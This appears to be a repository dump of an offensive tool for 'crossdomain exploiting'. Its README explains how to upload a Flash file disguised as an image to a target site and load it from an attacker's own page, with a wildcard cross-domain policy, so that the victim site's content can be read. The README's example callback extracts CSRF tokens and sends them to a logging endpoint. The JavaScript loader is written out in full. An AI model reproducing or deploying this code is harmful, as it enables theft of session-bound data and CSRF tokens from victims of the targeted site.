├── README.md
└── public
    ├── crossdomain.js
    ├── crossdomain.swf
    ├── crossdomain.xml
    └── index.html


/README.md:
--------------------------------------------------------------------------------
 1 | # crossdomain
 2 | Crossdomain exploiting
 3 | 
 4 | ### How to use this?
 5 | 
 6 | In crossdomain.js, edit the following line:
 7 | ```
 8 | crossdomain.setTarget('http://www.olivierbeg.nl/');
 9 | ```
10 | 
11 | then:
12 | - Upload the crossdomain.swf to the target (you can rename it to crossdomain.png or whatever).
13 | - Upload the crossdomain.js, crossdomain.xml and the index.html to the root of your own server.
14 | - Update the following information:
15 | ```
16 | crossdomain.setTarget('http://www.olivierbeg.nl/');
17 | crossdomain.setFile('crossdomain.swf');
18 | ```
19 | 
20 | - At `crossdomain.setTarget` you file in the page of which you want the content.
21 | - At `crossdomain.setFile` you set the location of the uploaded swf file.
22 | 
23 | 
24 | ### How do I handle the data?
25 | 
26 | In `crossdomain.js` there is a callback function, this function receives all the content sent through the flash file that loads the data from the remote website. To exploit it further you can change the crossdomain.callback function to handle the data.
27 | 
28 | __For example:__
29 | ```
30 | 'callback': function (data) {
31 |   console.log(data);
32 | }
33 | ```
34 | 
35 | Can become something like:
36 | 
37 | ```
38 | 'callback': function (data) {
39 |   var response = data.match('csrf value=(.*)>');
40 |   if(response != null) {
41 |     var img = document.createElement('img');
42 |     img.src = 'log.php?response=' + escape(JSON.parse(response));
43 | 
44 |     document.getElementById('dump').appendChild(img);
45 |   }
46 | }
47 | ```
48 | 


--------------------------------------------------------------------------------
/public/crossdomain.js:
--------------------------------------------------------------------------------
 1 | var crossdomain = {
 2 |     /*
 3 |      * Set the domain to reach.
 4 |      * @type string
 5 |      */
 6 |     'target' : '',
 7 |     /*
 8 |      * attributes for the object tag.
 9 |      * @type object
10 |      */
11 |     'attr': attr = {
12 |         'id': 'myObject',
13 |         'width': 0,
14 |         'height': 0,
15 |         'AllowScriptAccess': 'always'
16 |     },
17 |     /*
18 |      * parameters for inside the object tag.
19 |      * @type object
20 |      */
21 |     'param': param = {
22 |         'AllowScriptAccess': 'always'
23 |     },
24 |     /*
25 |      * The callback function receives all the data forwarded from the flash file.
26 |      * @param string data
27 |      * @return void
28 |      */
29 |     'callback': function (data) {
30 |         console.log(data);
31 |     },
32 |     'getParams' : function() {
33 |         var response = '';
34 |         for (i in this.param) {
35 |             response += '<param name="' + i + '" value="' + this.param[i] + '" />';
36 |         }
37 | 
38 |         return response;
39 |     },
40 |     'getAttributes' : function() {
41 |         var response = '';
42 |         for (i in this.attr) {
43 |             response += ' ' + i + '="' + this.attr[i] + '"';
44 |         }
45 | 
46 |         return response;
47 |     },
48 |     /*
49 |      * This functions implements the flash object on the page.
50 |      * @param string src
51 |      * @return void
52 |      */
53 |     'create': function (element) {
54 |         var i;
55 |         this.attr.type = 'application/x-shockwave-flash';
56 |         if (window.ActiveXObject) {
57 |             this.attr.classid = 'clsid:d27cdb6e-ae6d-11cf-96b8-444553540000';
58 |             this.param.movie = this.file + '?input=' + this.target;
59 |         }
60 |         else {
61 |             this.attr.data = this.file + '?input=' + this.target;
62 |         }
63 |         var response = '<object' + this.getAttributes() + '>' + this.getParams() + '</object>';
64 | 
65 |         if(element !== undefined) {
66 |             var dump = document.querySelector(element);
67 |             dump.innerHTML = response;
68 |             return true; 
69 |         }
70 | 
71 |         document.write(response);
72 |     },
73 |     /*
74 |      * Set the domain to target
75 |      * @param string target
76 |      * @return void
77 |      */
78 |     'setTarget' : function(target) {
79 |         this.target = target;
80 |     },
81 |     /*
82 |      * Set the flash files location
83 |      * @param string file
84 |      * @return void
85 |      */
86 |     'setFile' : function(file) {
87 |         this.file = file;
88 |     }
89 | };
90 | sendToJavaScript = crossdomain.callback;
91 | 
92 | crossdomain.setTarget('http://www.olivierbeg.nl/');
93 | crossdomain.setFile('crossdomain.swf');
94 | crossdomain.create();


--------------------------------------------------------------------------------
/public/crossdomain.swf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/smiegles/crossdomain/21124ab28c78cb83ade38fcfcd07f22f43f5e835/public/crossdomain.swf


--------------------------------------------------------------------------------
/public/crossdomain.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0"?>
2 | <cross-domain-policy>
3 |     <allow-access-from domain="*" />
4 | </cross-domain-policy>


--------------------------------------------------------------------------------
/public/index.html:
--------------------------------------------------------------------------------
1 | <html>
2 |   <head>
3 |     <title>Crossdomain exploiting.</title>
4 |     <meta charset="UTF-8">
5 |     <meta name="viewport" content="width=device-width, initial-scale=1.0">
6 |     <script src="crossdomain.js" type="text/javascript"></script>
7 |   </head>
8 |   <body></body>
9 | </html>


--------------------------------------------------------------------------------